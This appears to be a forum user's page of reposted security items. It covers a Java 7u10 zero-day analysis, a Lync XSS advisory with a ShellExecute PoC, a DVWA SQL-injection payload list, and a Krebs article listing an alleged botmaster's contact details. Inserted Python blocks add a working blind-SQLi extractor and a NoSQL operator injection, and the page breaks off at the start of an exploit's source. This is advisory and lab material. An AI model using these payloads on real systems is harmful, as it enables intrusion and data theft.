Everything posted by Nytro

  1. This write-up documents an analysis of the current Java zero-day floating around that affects version 7 update 10.

Hello All,

We were notified today of ongoing attacks with the use of a new Java vulnerability affecting the latest version 7 Update 10 of the software [1][2]. Due to the unpatched status of Issue 50 [3] and some inquiries received regarding whether the attack code found exploited this bug, we had a quick look at the exploit code found in the wild. Below, we are providing you with the results of our analysis.

The 0-day attack code that was spotted in the wild today is yet another instance of Java security vulnerabilities that stem from the insecure implementation of the Reflection API [4]. The new attack is a combination of two vulnerabilities.

The first flaw allows loading arbitrary (restricted) classes by means of the findClass method of the com.sun.jmx.mbeanserver.MBeanInstantiator class. This can be accomplished with this code:

```java
public static Class loadClass(String name) throws Throwable {
    JmxMBeanServerBuilder jmxbsb = new JmxMBeanServerBuilder();
    JmxMBeanServer jmxbs = (JmxMBeanServer) jmxbsb.newMBeanServer("", null, null);
    MBeanInstantiator mbi = jmxbs.getMBeanInstantiator();
    return mbi.findClass(name, (ClassLoader) null);
}
```

The problem stems from an insecure call to the Class.forName() method.

The second issue abuses the new Reflection API to successfully obtain and call MethodHandle objects that point to methods and constructors of restricted classes. This second issue relies on the invokeWithArguments method call of the java.lang.invoke.MethodHandle class, which has already been the subject of a security problem (Issue 32, which we reported to Oracle on Aug 31, 2012). The company released a fix for Issue 32 in Oct 2012. However, it turns out that the fix was not complete, as one can still abuse the invokeWithArguments method to set up calls to the invokeExact method with a trusted system class as the target method caller.

This time the call is, however, made to methods of the new Reflection API (from the java.lang.invoke.* package), many of which rely on security checks conducted against the caller of the target method. Oracle's fix for Issue 32 relies on binding the MethodHandle object to the caller of a target method / constructor if it denotes a potentially dangerous Reflection API call. This binding takes the form of injecting an extra stack frame from the caller's Class Loader namespace into the call stack prior to issuing a security-sensitive method call. Calls to blacklisted Reflection APIs are detected with the use of the isCallerSensitive method of the MethodHandleNatives class. The blacklisting, however, focuses primarily on the Core Reflection API (Class.forName(), Class.getMethods(), etc.) and does not take into account the possibility of using new Reflection API calls. As a result, the invokeWithArguments trampoline used in the context of a system (privileged) lookup object may still be abused for gaining access to restricted classes, their methods, etc.

The above is important in the context of a security check that is implemented by the Lookup class. Its checkSecurityManager method compares the Class Loader (CL) namespace of the caller class of a target find* method (findStatic, findVirtual, etc.) with the CL namespace of the class for which a given find operation is conducted. Access to restricted packages is not checked only if the Class Loader namespaces are equal (the case for the public lookup object, but also for a trusted method caller such as invokeWithArguments invoked for a non-blacklisted method).

The exploit vector used by the attack code is the same as the one we used for the second instance of our Proof of Concept code for Issue 32 (reported to Oracle on 17-Sep-2012). This exploit vector relies on the sun.org.mozilla.javascript.internal.GeneratedClassLoader class in order to define a fully privileged attacker's class in a system Class Loader namespace. From that point all security checks can be easily disabled.

This is not the first time Oracle fails to "sync" the security of the Core and new Reflection APIs. Just to mention the Reflection API filter. This is also not the first time Oracle's own investigation / analysis of security issues turns out to be not sufficiently comprehensive. Just to mention Issue 50, which was discovered in the code addressed by the company not so long ago...

Bugs are like mushrooms: in many cases they can be found in close proximity to those already spotted. It looks like Oracle either stopped picking too early or they are still deep in the woods...

Thank you.

Best Regards
Adam Gowdiak

---------------------------------------------
Security Explorations
http://www.security-explorations.com
"We bring security research to the new level"
---------------------------------------------

References:
[1] Malware don't need Coffee: 0 day 1.7u10 spotted in the Wild - Disable Java Plugin NOW! http://malware.dontneedcoffee.com/2013/01/0-day-17u10-spotted-in-while-disable.html
[2] New year, new Java zeroday! http://labs.alienvault.com/labs/index.php/2013/new-year-new-java-zeroday/
[3] [SE-2012-01] Critical security issue affecting Java SE 5/6/7 http://seclists.org/fulldisclosure/2012/Sep/170
[4] SE-2012-01 Details http://www.security-explorations.com/en/SE-2012-01-details.html

Via: Java Zero-Day Analysis - Packet Storm
  2. Microsoft Lync 2012 Code Execution Vulnerability

Summary
=======
Microsoft Lync 2010 fails to properly sanitize user-supplied input, which can lead to remote code execution. Microsoft was originally notified of this issue on December 11, 2012. The details of this issue were made public on January 11, 2013.

CVE number: Not Assigned
Impact: Low
Vendor homepage: http://lync.microsoft.com/
Vendor notified: December 11, 2012
Vendor fixed: N/A
Credit: Christopher Emerson of White Oak Security (http://www.whiteoaksecurity.com/)

Affected Products
=================
Confirmed in Microsoft Lync Server 2010, version 4.0.7577.0. Other versions may also be affected.

Details
=======
Microsoft Lync 2010, version 4.0.7577.4087, fails to sanitize the "User-Agent" header for meet.domainname.com. By inserting JavaScript into the aforementioned parameter and stacking commands, an attacker can execute arbitrary commands in the context of the application.

Impact
======
Malicious users could execute arbitrary applications on the client systems, compromising the confidentiality, integrity and availability of information on the client system.

Solution
========
The vendor should implement thorough input validation in order to remove dangerous characters from user-supplied data. Additionally, the vendor should implement thorough output encoding in order to display, and not execute, dangerous characters within the browser.

Proof-of-Concept (PoC)
======================
The following request is included as a proof of concept. The proof of concept is designed to open notepad.exe when the request is received by the server.

```http
GET /christopher.emerson/JW926520 HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/xaml+xml, application/vnd.ms-xpsdocument, application/x-ms-xbap, application/x-ms-application, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)";var oShell = new ActiveXObject("Shell.Application");var commandtoRun = "C:\\Windows\\notepad.exe";oShell.ShellExecute(commandtoRun,"","","open","1");-"
Host: meet.domainname.com
Connection: Keep-Alive
Cookie: LOCO=yes; icscontext=cnet; ProfileNameCookie=Christopher
```

Below is an abbreviated copy of the response:

```html
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-MS-Server-Fqdn: domainname.com
X-Powered-By: ASP.NET
Date: Mon, 07 May 2012 20:26:55 GMT
Connection: keep-alive
Content-Length: 23901

<!--NOTE: If DOCTYPE element is present, it causes the iFrame to be displayed in a small-->
<!--portion of the browser window instead of occupying the full browser window.-->
<html xmlns="http://www.w3.org/1999/xhtml" class="reachJoinHtml">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=10; IE=9; IE=8; requiresActiveX=true" />
<title>Microsoft Lync</title>
<script type="text/javascript">
var reachURL = "https://domainname.com/Reach/Client/WebPages/ReachJoin.aspx?xml=[...]";
var escapedXML = "'\x3c\x3fxml version\x3d\x221.0\x22 encoding\x3d\x22utf-8\x22\x3f\x3e\x3cconf-info xmlns\x3axsi\x3d\x22http\x3a\x2f\x2fwww.w3.org\x2f2001\x2fXMLSchema-instance\x22 xmlns\x3axsd\x3d\x22http\x3a\x2f\x2fwww.w3.org\x2f2001\x2fXMLSchema\x22 xmlns\x3d\x22http\x3a\x2f\x2fschemas.microsoft.com\x2frtc\x2f2009\x2f05\x2fsimplejoinconfdoc\x22\x3e\x3cconf-uri\x3esip\x3achristopher.emerson\x40domainname.com\x3bgruu\x3bopaque\x3dapp\x3aconf\x3afocus\x3aid\x3aJW926520\x3c\x2fconf-uri\x3e\x3cserver-time\x3e91.8004\x3c\x2fserver-time\x3e\x3coriginal-incoming-url\x3ehttps\x3a\x2f\x2fmeet.domainname.com\x2fchristopher.emerson\x2fJW926520\x3c\x2foriginal-incoming-url\x3e\x3cconf-key\x3eJW926520\x3c\x2fconf-key\x3e\x3c\x2fconf-info\x3e'";
var showJoinUsingLegacyClientLink = "False";
var validMeeting = "True";
var reachClientRequested = "False";
var currentLanguage = "en-US";
var reachClientProductName = "Lync Web App";
var crackUrlRequest = "True";
var isNokia = "False";
var isAndroid = "False";
var isWinPhone = "False";
var isIPhone = "False";
var isIPad = "False";
var isMobile = "False";
var isUnsupported = "False";
var domainOwnerJoinLauncherUrl = "";
var lyncLaunchLink = "conf:sip:christopher.emerson@domainname.com;gruu;opaque=app:conf:focus:id:JW926520%3Frequired-media=audio";
var errorCode = "-1";
var diagInfo = "Machine:MachineNameBrowserId:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)";var oShell = new ActiveXObject("Shell.Application");var commandtoRun = "C:\\Windows\\notepad.exe";oShell.ShellExecute(commandtoRun,"","","open","1");-"Join attempted at:5/7/2012 3:26:55 PM";
var resourceUrl = "/meet/JavaScriptResourceHandler.ashx?lcs_se_w14_onprem4.0.7577.197&language=";
```

Vendor Statement
================
The vulnerability described in this report is an XSS vulnerability in the User-Agent which requires an attacker to be in a man-in-the-middle situation in order to be able to modify the User-Agent. In a default configuration of Lync server, TLS encryption is used to protect against this type of attack. Customers concerned about this issue should check their environments to ensure that Lync is configured to use TLS to encrypt all traffic, a default configuration.

Disclosure Timeline
===================
December 11, 2012: Disclosed to vendor (Microsoft Security Response Center).
December 18, 2012: Vendor's initial response.
December 20, 2012: Vendor deemed issue a Low severity and confirmed issue would be fixed in next product release.
December 27, 2012: Received vendor approval to disclose along with Vendor Statement (see above).
January 11, 2013: Disclosed vulnerability publicly (http://whiteoaksecurity.com/blog/2013/1/11/microsoft-lync-server-2010-remote-code-executionxss-user-agent-header).

=====================================================================
# 3C8F2163853A5DE5 1337day.com [2013-01-13] 1A58B10CEE71628B #

Source: 1337day Inj3ct0r Exploit Database : vulnerability : 0day : shellcode by Inj3ct0r Team
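The response above shows the defect in one line: escapedXML is emitted with every special character turned into \xNN, while diagInfo concatenates the raw User-Agent into a JavaScript string literal, so a header containing `";` closes the literal and the rest runs as script. The following Python is an added example (my code, not White Oak's or Microsoft's) that reproduces the vulnerable line and a hardened one that applies the same \xNN encoding the page already uses for escapedXML, then checks that the advisory's PoC User-Agent can no longer close the literal. The host name, the timestamp and the shortened User-Agent are constructed for the example.

```python
import re

# PoC User-Agent from the advisory above, shortened (the ".NET CLR" tokens play no role).
POC_UA = ('Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)";'
          'var oShell = new ActiveXObject("Shell.Application");'
          'oShell.ShellExecute("C:\\\\Windows\\\\notepad.exe","","","open","1");-"')


def render_vulnerable(user_agent):
    # Mirrors the diagInfo line in the response: the raw header lands inside a JS string literal.
    return ('var diagInfo = "Machine:HOST BrowserId:' + user_agent
            + ' Join attempted at:5/7/2012";')


def js_string_literal(value):
    """Encode value as a JavaScript string literal the way the page's own escapedXML variable is
    built: every character outside [A-Za-z0-9 ] becomes \\xNN (or \\uNNNN above U+00FF), so the
    attacker's quotes, parentheses and semicolons can never terminate the literal."""
    out = []
    for ch in value:
        cp = ord(ch)
        if (cp < 128 and ch.isalnum()) or ch == " ":
            out.append(ch)
        elif cp < 0x100:
            out.append("\\x%02x" % cp)
        else:
            out.append("\\u%04x" % cp)
    return '"' + "".join(out) + '"'


def render_hardened(user_agent):
    # Same line, but the whole string value passes through the encoder before it is emitted.
    text = "Machine:HOST BrowserId:" + user_agent + " Join attempted at:5/7/2012"
    return "var diagInfo = " + js_string_literal(text) + ";"


def js_unescape(literal):
    """Decode the literal as the browser's JS parser would, to show the encoding is lossless."""
    body = literal[1:-1]  # strip the surrounding double quotes
    return re.sub(r"\\x([0-9a-f]{2})|\\u([0-9a-f]{4})",
                  lambda m: chr(int(m.group(1) or m.group(2), 16)), body)


def unescaped_quotes(js_line):
    """Count double quotes not preceded by a backslash. One intact literal has exactly two;
    any more means the header closed the string and the remainder is parsed as code."""
    return len(re.findall(r'(?<!\\)"', js_line))


if __name__ == "__main__":
    print(render_vulnerable(POC_UA))
    print(render_hardened(POC_UA))
```

The check is deliberately mechanical: a diagnostic string that needs no quotes at all yields exactly two unescaped quotes after encoding, whereas the vulnerable rendering of the PoC header contains a dozen more. Note that this encoder is correct only for a value placed inside a double-quoted JS string; output inside an HTML attribute or a `<script>`-terminating context needs the encoder for that context.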
  3. It was just irony, Mr. Tinkode fan. To spend 5 minutes finding a SQL injection in a site you have to pick the site, right? You picked "Asociatia Asistentilor Medicali din Banat". I only asked you: "WHY?". You must have a reason, right? Or was it just a dork and these "wretches" happened to land in the first Google results? My question is simple: "What is the reason you chose this site?".
  4. Wow, what "targets"... How do you find them?
  5. Or learn C/C++ and you'll be able to program for the fridge or the microwave oven too...
  6. Java is cross-platform, meaning you can build an application that runs on both Windows and Linux. The main problem is that it needs the JRE (Java Runtime) in order to run. To write applications in Java you have to know the classes it offers. Another problem with Java is that it is starting to be less well regarded because a great many exploits have appeared. Visual Basic is strictly a Microsoft brand, and I think you mean VB.NET, because I don't think there's any point staying with VB6. If you want to program strictly for Windows, then you can use VB.NET, but I'd rather recommend C#. The .NET Framework is an extremely powerful framework that offers many advantages for writing an application quickly, but like the JRE it is a dependency required to run the applications that use it.
  7. I don't understand why there's so much fuss about this; you'd have to be thick as a tank to click on this: Then click Run: And then there's still the chance it won't work: The only browser that doesn't warn you that you're about to execute Java code is Opera (at least the version I have), but the "Run" window, on top of the warnings the other browsers show asking for the user's permission, always appears.
  8. Police Arrest Alleged ZeuS Botmaster "bx1"

A man arrested in Thailand this week on charges of stealing millions from online bank accounts fits the profile of a miscreant nicknamed "bx1," a hacker fingered by Microsoft as a major operator of botnets powered by the ZeuS banking trojan.

As reported by The Bangkok Post, 24-year-old Hamza Bendelladj, an Algerian national, was detained this weekend at Bangkok's Suvarnabhumi airport, as he was in transit from Malaysia to Egypt. This young man captured news media attention when he was brought out in front of Thai television cameras handcuffed but smiling broadly, despite being blamed by the FBI for hacking into customer accounts at 217 financial institutions worldwide. Thai investigators told reporters that Bendelladj had amassed "huge amounts" in illicit earnings, and that "with just one transaction he could earn 10 to 20 million dollars. He's been travelling the world flying first class and living a life of luxury."

I didn't fully appreciate why I found this case so interesting until I started searching the Internet and my own servers for his email address. Turns out that in 2011, I was contacted via instant message by a hacker who said he was operating botnets using the Zeus and SpyEye Trojans. This individual reached out to me repeatedly over the next year, for no apparent reason except to brag about his exploits. He contacted me via Microsoft's MSN instant message platform, using the email address daniel.h.b@universityofsutton.com. That account used the alias "Daniel." I later found out that Daniel also used the nickname bx1. According to several forums on which bx1 hung out until very recently, the man arrested in Thailand and bx1 were one and the same.

A review of the email addresses and other contact information bx1 shared on these forums suggests that bx1 was the 19th and 20th John Doe named in Microsoft's 2012 legal suit seeking to discover the identities of 39 alleged ZeuS botmasters. From the complaint Microsoft submitted to the U.S. District Court for the Eastern District of Virginia, and posted at Zeuslegalnotice.com:

"Plaintiffs are informed and believe and thereupon allege that John Doe 19/20 goes by the aliases "Daniel," "bx1," "Daniel Hamza" and "Danielbx1" and may be contacted at messaging email and messaging addresses "565359703," airlord1988@gmail.com, bx1@hotmail.com, i_amhere@hotmail.fr, daniel.h.b@universityofsutton.com, princedelune@hotmail.fr, bx1_@msn.com, danibx1@hotmail.fr, and danieldelcore@hotmail.com. Upon information and belief, John Doe 19/20 has purchased and used the Zeus/SpyEye code."

The Daniel I chatted with was proud of his work, and seemed to enjoy describing successful attacks. In one such conversation, dated January 2012, bx1 bragged about breaking into the systems of a hacker who used the nickname "Symlink" and was renowned in the underground for writing complex, custom Web injects for ZeuS and SpyEye users. Specifically, Symlink's code was designed to automate money transfers out of victim banks to accounts that ZeuS and SpyEye botmasters controlled. Here's an excerpt from that chat:

(12:31:22 AM) Daniel: if you wanna write up a story
(12:31:34 AM) Daniel: a very perfect
(12:31:34 AM) Daniel: even Interpol will get to you
(12:31:35 AM) Brian Krebs: ?
(12:31:42 AM) Daniel: i hacked the guy who fucked most banks
(12:31:48 AM) Daniel: symlink the guy who made ATS
(12:31:49 AM) Daniel: :)
(12:32:02 AM) Daniel: ATS = Auto Transfer System
(12:32:15 AM) Daniel: and get his Backups + Pictures and all his details
(12:32:37 AM) Daniel: Recent Job etc etc
(12:33:06 AM) Brian Krebs: what's his name?
(12:33:17 AM) Daniel: full name ?
(12:34:03 AM) Brian Krebs: yeah
(12:34:10 AM) Daniel: hmmmm
(12:34:50 AM) Daniel: besliu vasile
(12:35:01 AM) Brian Krebs: what kind of name is that?
(12:35:11 AM) Brian Krebs: romanian?
(12:35:13 AM) Daniel: Moldovian name
(12:35:53 AM) Daniel: he is ugly motherufcka.
(12:36:18 AM) Daniel: after i hacked him he said that i destroyed his life (
(12:36:27 AM) Brian Krebs: aww
(12:36:55 AM) Daniel: yea because i spoke to him
(12:37:10 AM) Daniel: i said how much u pay for ur info to stay private
(12:37:19 AM) Daniel: then he said he destroyed his [hard drive]
(12:37:28 AM) Daniel: i said i dont care i got Backup
(12:37:32 AM) Daniel: it tooks me months to download all
(12:37:48 AM) Daniel: his Previous job..ats..proof video
(12:37:55 AM) Daniel: his picture with Zeus botnet showing up money
(12:38:12 AM) Daniel: his car Plate number
(12:38:17 AM) Daniel: Girls Friends
(12:38:23 AM) Daniel: his workshop. he is mechanic
(12:40:49 AM) Brian Krebs: huh. how come it took you months to [download]?
(12:41:43 AM) Daniel: i waiting for him
(12:41:46 AM) Daniel: if he don't [pay] then i share just his personel info
(12:41:57 AM) Daniel: and videos that proof abt his jobs etc etc

It's not clear whether bx1 had anything to do with it, but according to a lengthy thread on Mazafaka, one of the Underweb's most exclusive cybercrime forums, Symlink was arrested late last year in Moldova. In a post on Oct. 11, 2012, forum regulars said Symlink had been arrested the day before, and that he got caught because he flaunted his ill-gotten wealth with fancy cars (a fully loaded Land Cruiser 200, valued at more than $100,000) and ostentatious lifestyle choices that were apparently considered far beyond the means of a local auto mechanic. As they do anytime a forum member gets arrested, the forum administrators banned Symlink's account to distance themselves from the former member.

"Economic police came to symlink yesterday. All computers were seized, one was encrypted and two not, all jabbers at the moment of seizure were online. Ban him temporarily, but better permanently. He was received adultly [meaning, arrested seriously]. Idiot overplayed."

It's safe to say that bx1 had his share of enemies, and it's possible that Symlink and/or his buddies got the last laugh. According to information obtained by KrebsOnSecurity, attackers recently targeted bx1 in a successful hack to break into his computer, making off with many files, email messages, screenshots and images from his machine. Among them were scanned copies of two identity cards, both bearing the name and likeness of Hamza "Daniel" Bendelladj; one from a "University of Sutton," and another that appears to be some kind of international ID card. It's not clear whether these documents are legitimate or manufactured, but probably the latter: the domain attached to bx1's MSN email address, universityofsutton.com, is registered with the following contact data:

```
domain: universityofsutton.com
owner: Daniel Delcore
organization: VIRUS & Malware Scanner
email: bx1_@msn.com
address: 522 8th street
city: Columbus
state: IN
postal-code: 47201
country: US
phone: +1.7573011758
admin-c: CCOM-1611324 bx1_@msn.com
tech-c: CCOM-1611324 bx1_@msn.com
billing-c: CCOM-1611324 bx1_@msn.com
```

Source: Police Arrest Alleged ZeuS Botmaster "bx1" - Krebs on Security
  9. Monitoring Strcpy With Bphook In The Immunity Debugger

Description: This is the solution to an exercise I had given in the SPSE course. I wanted the students to write a BPHook in the Immunity Debugger to monitor the arguments of the strcpy function. Due to the sparse documentation of the Immunity Debugger, this turned out to be quite a challenge for many students. Why is this useful? API monitoring is probably the most fundamental thing when you want to observe programs at runtime and understand what they are doing. This video gives you the details on how to use the Immunity Debugger to write such a hook.

SPSE Course details and sample videos: SecurityTube Python Scripting Expert
  10. Nosql, No Security?

Description: Serving as a scalable alternative to traditional relational databases (RDBs), NoSQL databases have exploded in popularity. NoSQL databases offer more efficient ways to work with large datasets, but serious security issues need to be addressed. NoSQL databases can suffer from a variety of injection attacks. Most NoSQL databases can't authenticate and authorize clients, and can't provide role-based access controls or encryption. Because these controls do not exist, developers and administrators are forced to implement their own controls to compensate for these shortcomings. These compensating controls could become a problem for organizations that have compliance considerations and could make maintaining NoSQL more complex than simply deploying an enterprise relational database that features built-in security.

Because many NoSQL architectures lack encryption and authentication, an attacker could eavesdrop on the client-server communication and obtain private data. Additionally, NoSQL databases can suffer from a variety of injection attacks via JavaScript and JSON. Traditional SQL injection countermeasures are not effective against these attacks, so developers must be aware of these threats and write code that attackers can't penetrate.

In this presentation we'll talk about how RDB security features and threats apply to NoSQL databases. We'll also explore the security controls that are present in NoSQL architectures, and cover administrative, compliance and regulatory concerns associated with operating NoSQL architectures in environments that contain sensitive data.

Speaker: Will Urbanski, Dell SecureWorks

Will Urbanski, vulnerability engineer, Dell SecureWorks, guides large enterprises in initiating and administering vulnerability management programs within their corporate environments. Will also conducts penetration and vulnerability validation tests. An information security professional with more than seven years of industry experience, Will has been published in numerous journals, including IEEE Security & Privacy, and has co-authored a patent for an IPv6 moving target defense. Previously, Will worked in research and in security operations roles at Virginia Polytechnic Institute and the University of Georgia. He holds a B.S. in Computer Science from the University of Georgia, and is certified as a PCI Approved Scanning Vendor, a GIAC Penetration Tester and a GIAC Web Application Penetration Tester.

Disclaimer: We are an infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be the same without verifying.

Original Source: NoSQL, No Security? - Will Urbanski on Vimeo

Source: Nosql, No Security?
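The abstract's point that "traditional SQL injection countermeasures are not effective" is easiest to see with a JSON operator injection: the attacker never breaks out of a string, so quote escaping has nothing to catch. The block below is an added example (mine, not the talk's material) in Python. It uses a small in-memory evaluator that implements a few MongoDB-style query operators ($ne, $gt, $regex) as a stand-in for a real document store, a constructed user collection, a login function that copies the parsed JSON body straight into the query, and a hardened version that rejects any credential that is not a plain string.

```python
import re

# Constructed user collection standing in for a NoSQL document store (not real data).
USERS = [
    {"username": "admin", "password": "S3cret!pass", "role": "admin"},
    {"username": "bob", "password": "hunter2", "role": "user"},
]


def _match_field(value, cond):
    """Evaluate one field condition. A dict is treated as an operator object, the way a
    MongoDB-style engine does; anything else is an equality match. Stand-in evaluator only."""
    if not isinstance(cond, dict):
        return value == cond
    for op, arg in cond.items():
        if op == "$ne":
            ok = value != arg
        elif op == "$gt":
            ok = value is not None and type(value) is type(arg) and value > arg
        elif op == "$regex":
            ok = isinstance(value, str) and re.search(arg, value) is not None
        else:
            raise ValueError("unsupported operator: %s" % op)
        if not ok:
            return False
    return True


def find(collection, query):
    """Return every document for which all query fields match."""
    return [doc for doc in collection
            if all(_match_field(doc.get(field), cond) for field, cond in query.items())]


def login_vulnerable(body):
    # The parsed JSON request body is copied into the query document as-is. A client that sends
    # {"password": {"$ne": ""}} turns the equality test into "password is not empty".
    return find(USERS, {"username": body["username"], "password": body["password"]})


def login_hardened(body):
    # Operator injection needs a non-string value, so enforce the type before building the query.
    username, password = body.get("username"), body.get("password")
    if not (isinstance(username, str) and isinstance(password, str)):
        raise ValueError("credentials must be strings")
    return find(USERS, {"username": username, "password": password})


# Constructed attacker request bodies. Neither contains a quote character, which is why
# SQL-style escaping of the input would not have helped.
OPERATOR_INJECTION = {"username": "admin", "password": {"$ne": ""}}
REGEX_PROBE = {"username": "admin", "password": {"$regex": "^S3"}}

if __name__ == "__main__":
    print(login_vulnerable(OPERATOR_INJECTION))   # admin document, password never known
    print(login_vulnerable(REGEX_PROBE))          # non-empty: the prefix guess was right
```

The $regex probe shows a second consequence of the same defect: a yes/no answer per request lets the attacker recover the stored value prefix by prefix. Validating the type of every value taken from the request (or using a schema validator that does the same) closes both, because the query engine never sees an object where a scalar belongs.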
  11. Dns - Spoof + Browser Exploitation

Description: In this video I will show you how to use Ettercap and the Browser Exploitation module to exploit a local machine without handing out any kind of URL. I'm using Ettercap for DNS spoofing and Metasploit for browser exploitation. Let's say the victim on your network is using Google, Yahoo, Gmail, or any website. What you have to use is Ettercap; you need to replace the path, and if the victim accesses Google or Yahoo with a vulnerable browser you will get a shell; if not, he will simply not be able to browse those particular sites. Very easy to follow, but it is a good technique I think.

Disclaimer: We are an infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be the same without verifying.

Original Source:

Source: Dns - Spoof + Browser Exploitation
  12. Dvwa - Blind Sql Injection

Description: In this video I will show you how to use SQL injection queries to exploit a database for usernames and hashes. I'm using DVWA with the low security level. Use Metasploitable 2 for DVWA.

SQL injection queries:

```sql
1' and 1=1#
1' and 1=1 order by 2 #
'or' 1=1--
1' and 1=0 union select null,table_name from information_schema.tables#
1' and 1=0 union select null,table_name from information_schema.columns where table_name='users' #
1' and 1=0 union select null,concat(table_name,0x0a,column_name) from information_schema.columns where table_name='users' #
1' and 1=0 union select null,concat(first_name,0x0a,password) from users #
1 and 1=0 union select table_name, column_name from information_schema.columns where table_name=0x7573657273
```

Disclaimer: We are an infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be the same without verifying.

Original Source:

Source: Dvwa - Blind Sql Injection
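The queries listed above are UNION-based (the page prints the selected columns back), whereas the post's title is blind injection, where all the attacker observes is whether a row came back. The block below is an added example, not from the video or from DVWA, that shows the boolean-based blind technique end to end: a constructed SQLite stand-in for DVWA's users table, the same string-concatenated query DVWA's low-security page builds, an oracle that reports only "row shown / not shown", ORDER BY probing of the column count as in the second query above, and character-by-character recovery of a password hash. Assumptions: SQLite rather than MySQL, so the comment tail is `-- ` instead of `#`; the rows and hashes are constructed.

```python
import sqlite3

# Constructed rows standing in for DVWA's users table. The hashes are md5("password") and
# md5("abc123"), chosen only so the recovered value is recognisable.
SAMPLE_USERS = [
    (1, "admin", "admin", "5f4dcc3b5aa765d61d8327deb882cf99"),
    (2, "Gordon", "Brown", "e99a18c428cb38d5f260853678922e03"),
]


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (user_id INTEGER PRIMARY KEY, "
                 "first_name TEXT, last_name TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?, ?)", SAMPLE_USERS)
    return conn


def vulnerable_lookup(conn, user_id):
    # Same construction as DVWA's low-security page: the id is concatenated into the query.
    sql = "SELECT first_name, last_name FROM users WHERE user_id = '%s'" % user_id
    return conn.execute(sql).fetchall()


def safe_lookup(conn, user_id):
    # Parameterised form: the id travels as data and can never become SQL syntax.
    return conn.execute("SELECT first_name, last_name FROM users WHERE user_id = ?",
                        (user_id,)).fetchall()


def page_shows_user(conn, payload):
    """Boolean oracle: True if the injected condition kept the row, False if it removed it
    or broke the query. This is everything a blind injection gets to observe."""
    try:
        return len(vulnerable_lookup(conn, payload)) > 0
    except sqlite3.Error:
        return False


def column_count(conn, max_cols=8):
    """ORDER BY n probing: the first n that errors is one past the number of columns,
    which is what the UNION queries in the post need to line up."""
    for n in range(1, max_cols + 1):
        if not page_shows_user(conn, "1' ORDER BY %d-- " % n):
            return n - 1
    return max_cols


def blind_extract(conn, subquery, alphabet="0123456789abcdef", max_len=64):
    """Recover the value of a scalar subquery one character at a time through the oracle.
    Each request asks "is character <pos> equal to <ch>?"; an empty substr() ends the value.
    SQLite syntax here; on DVWA's MySQL the tail would be '#' instead of '-- '."""
    recovered = ""
    for pos in range(1, max_len + 1):
        for ch in alphabet:
            payload = "1' AND substr((%s), %d, 1) = '%s'-- " % (subquery, pos, ch)
            if page_shows_user(conn, payload):
                recovered += ch
                break
        else:
            break  # no candidate matched: past the end of the value
    return recovered


if __name__ == "__main__":
    db = make_db()
    print("columns:", column_count(db))
    print("admin hash:", blind_extract(db, "SELECT password FROM users WHERE user_id = 1"))
```

With a 16-character alphabet and a 32-character hash the extraction costs at most 512 requests plus one terminating miss; a real engagement would use a binary search on the character code instead of a linear scan. The parameterised lookup returns nothing for the same payloads because the whole string is matched against user_id as a value.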
  13. Becoming popular: Java Applet JMX Remote Code Execution
Malware Intelligence Lab from FireEye - Research & Analysis of Zero-Day & Advanced Targeted Threats: Happy New Year from New Java Zero-Day
Java allows 'open hunting season' for hackers, experts find | ZDNet
Mozilla touts 'Click to Play' in defense against Java vulnerability | ZDNet
  14. Web Warriors ~ CBC Documentary

http://www.youtube.com/watch?feature=player_detailpage&v=34cwMz3HZ8Q

Enter the world of hackers and cyber sleuths. The internet is touted as one of the most important inventions in the history of modern man, and like the discovery of the atom, its ability to benefit mankind is matched only by its potential to unleash massive destruction. Web Warriors is a one-hour documentary that offers an unprecedented glimpse into the world's newest and most vulnerable frontier: cyberspace. We enter the world of hackers like Mafia Boy - a 15 year old high school student who rose to infamy in 2000 by causing millions of dollars in damage after single-handedly shutting down internet giants - including Yahoo, Amazon, eBay, Dell, eTrade, and CNN. We'll meet hackers like Donnie who goes on a journey into the Russian cyber underground as he searches for the creators of a computer virus with the hopes of collecting the $250,000 bounty being offered by Microsoft. Just as in nature, computer viruses have rapidly evolved and now have the ability to control millions of computers unbeknownst to their owners, thereby creating massive illegal computer networks known as "Botnets". These "Botnets" are being put to a variety of illicit uses including identity theft and cyber extortion, but they are also the latest and most potent weapon being deployed in military conflicts. Web Warriors dissects the massive cyber attack against Estonia in 2007 which virtually shut down the country and resulted in NATO deploying its cyber response team. Web Warriors offers rare interviews with cyber sleuths from the FBI, the Pentagon, NATO, and the Department of Homeland Security who explain how cyberspace has become the latest battle ground between nation states and how terrorist groups are already plotting their next move. Web Warriors offers a fast-paced never-seen before glimpse into the cyber trenches of a world wide battle.
Some reports say the cost of cyber crime is now on par with the illegal drug trade. Web Warriors was produced by Edward Peill for Tell Tale Productions Inc.
  15. Details:
New year, new Java zeroday! - AlienVault Labs
Malware don't need Coffee: 0 day (CVE-2013-0422) 1.7u10 spotted in the Wild - Disable Java Plugin NOW!
http://pastebin.com/raw.php?i=cUG2ayjh
Exploit Packs updated with New Java Zero-Day vulnerability - Hacking News

```java
/*
 * Java 0day 1.7.0_10 decrypted source
 * Originally placed on https://damagelab.org/index.php?showtopic=23719&st=0
 * From Russia with love.
 */
import java.applet.Applet;
import com.sun.jmx.mbeanserver.JmxMBeanServer;
import com.sun.jmx.mbeanserver.JmxMBeanServerBuilder;
import com.sun.jmx.mbeanserver.MBeanInstantiator;
import java.lang.invoke.MethodHandle;
import java.lang.invoke.MethodHandles;
import java.lang.invoke.MethodType;
import java.lang.reflect.Method;

// The posted decompilation omits the class declaration; the applet's real class name is not given.
public class Exploit extends Applet {

